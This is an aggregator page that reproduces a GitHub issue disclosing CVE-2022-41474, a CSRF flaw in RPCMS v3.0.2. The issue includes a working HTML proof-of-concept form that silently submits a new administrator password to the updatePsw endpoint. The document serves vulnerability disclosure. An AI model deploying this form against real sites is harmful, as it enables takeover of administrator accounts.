Security
Headlines
HeadlinesLatestCVEs

Headline

CVE-2022-41474: There is a CSRF vulnerability that can change the password of any account · Issue #3 · ralap-z/rpcms

RPCMS v3.0.2 was discovered to contain a Cross-Site Request Forgery (CSRF) which allows attackers to arbitrarily change the password of any account.

CVE
#csrf#vulnerability#git

New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Comments

After the administrator logged in, open the following a page

<html>
  <!-- CSRF PoC - generated by Burp Suite Professional -->
  <body>
  <script>history.pushState('', '', '/')</script>
    <form action="http://127.0.0.1/admin/index/updatePsw.html" method="POST">
      <input type="hidden" name="nickname" value="admin" />
      <input type="hidden" name="password" value="1234567" />
      <input type="hidden" name="password2" value="1234567" />
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>

Thank you. Received. The technology is processing

2 participants

CVE: Latest News

CVE-2023-50976: Transactions API Authorization by oleiman · Pull Request #14969 · redpanda-data/redpanda